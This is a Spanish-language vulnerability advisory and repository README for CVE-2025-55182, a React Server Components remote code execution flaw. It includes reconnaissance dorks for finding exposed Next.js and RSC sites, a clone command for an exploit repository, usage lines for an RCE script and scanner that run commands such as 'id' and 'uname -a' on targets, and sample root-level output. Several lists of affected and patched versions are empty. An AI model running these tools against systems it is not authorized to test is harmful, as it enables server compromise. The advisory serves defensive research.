
Una vulnerabilidad crítica de Ejecución Remota de Código (RCE) que afecta la implementación de los Componentes del Servidor de React (RSC) en múltiples paquetes, incluyendo.
CVE-2025-55182 es una vulnerabilidad crítica de Ejecución Remota de Código (RCE) que afecta la implementación de React Server Components (RSC) en múltiples paquetes, incluyendo:
La vulnerabilidad existe debido a la deserialización insegura de cargas útiles enviadas a través del protocolo Flight interno utilizado por RSC. Cuando cierta entrada no confiable fluye a través de React Server Components mediante solicitudes HTTP, se puede desencadenar la ejecución de código en el lado del servidor.
Las versiones afectadas incluyen:
Las versiones parcheadas incluyen:
React Server Components acepta solicitudes del lado del cliente que se analizan y deserializan en el backend. La vulnerabilidad surge de controles insuficientes en torno a la deserialización de datos entrantes, permitiendo que cargas útiles especialmente diseñadas sean interpretadas como componentes ejecutables del lado del servidor.
Cuando esto ocurre, puede producirse la ejecución arbitraria de JavaScript en el servidor, lo que puede llevar a un compromiso total del servidor dependiendo del entorno de alojamiento y los privilegios.
Si se explota, un atacante podría ser capaz de:
Puntuación CVSS: 10.0 – CRÍTICA
Verificar si la aplicación expone React Server Components y si se están utilizando versiones afectadas.
curl -I https://target.com/?__rsc=1
Estas palabras clave ayudan a identificar si un repositorio o aplicación web pública referencia componentes RSC.
"React Server Components" "Flight" inurl:src
"react-server-dom-webpack" filetype:lock
"server.references" "react"
"rsc" "react-dom"
site:yourdomain.com "react-server"
site:yourdomain.com "flight" "react"
site:yourdomain.com "rsc"
Destinado únicamente a la auditoría interna del dominio de su organización.
Verifique el uso de framework expuesto, no la explotación de vulnerabilidades.
http.title:"Next.js"
"powered by" "Next.js"
X-Powered-By: Next.js
http.favicon.hash=
title="Next.js"
header="next-router-state-tree"
body="/_next/static/"
server="next"
Para automatizar el escaneo defensivo, clone la lógica de detección basada en plantillas para su propia evaluación de infraestructura:
git clone https://github.com/cyberleelawat/CVE-2025-55182.git
cd CVE-2025-55182
$ nuclei -u http://localhost:3001 -t cve-2025-55182.yaml
[cve-2025-55182:command_output] [http] [critical] http://localhost:3001 ["uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)"]
[INF] Scan completed in 28.35483ms. 1 matches found.
CVE-2025-55182.py)Script de exploit RCE completo que ejecuta comandos arbitrarios y obtiene la salida.
Uso:
python3 CVE-2025-55182.py http://target.com:3000 -c "id"
python3 CVE-2025-55182.py https://target.com -c "whoami" --no-check-ssl
python3 CVE-2025-55182.py 192.168.1.100:3000 -c "uname -a"
chmod +x scanner.sh
# Scan with default command (id)
./scanner.sh -d example.com
# Execute custom command
./scanner.sh -d example.com -c "whoami"
# With full URL
./scanner.sh -d https://example.com -c "uname -a"
-d, --domain - Dominio/URL objetivo (requerido)-c, --command - Comando a ejecutar (por defecto: id)# Check if target is vulnerable
./scanner.sh -d vulnerable-app.com
# Get system information
./scanner.sh -d vulnerable-app.com -c "uname -a"
# List files
./scanner.sh -d vulnerable-app.com -c "ls -la /tmp"
Bash
curl
openssl
Las plantillas dentro del repositorio están destinadas a:
IMPORTANTE: Estas plantillas solo deben ejecutarse en sistemas de su propiedad o para los que tenga autorización de evaluación.
Las plantillas de Nuclei incluidas en este repositorio están destinadas únicamente a:
Asegúrese de:
Actualice a una de las versiones parcheadas:
Investigador de Seguridad • Entrenador de Ciberseguridad • Cazador de Recompensas
Lema: Zero Trust Full Secure 🚀
CVE-2025-55182 es actualmente una de las amenazas más críticas para las infraestructuras basadas en React. Debido al vector de explotación trivial y a la superficie de ataque no autenticada, se recomienda encarecidamente el parcheo inmediato. Cualquier organización que ejecute versiones afectadas de RSC debería considerar una prioridad de emergencia.
Este repositorio y documentación son para investigación defensiva y validación de seguridad de activos de su propiedad. Cualquier uso indebido puede ser ilegal. Usted es responsable de cumplir con las leyes y políticas organizacionales.
Hecho con ❤️ por Cyber Leelawat
Zero Trust Full Secure 🎯🔐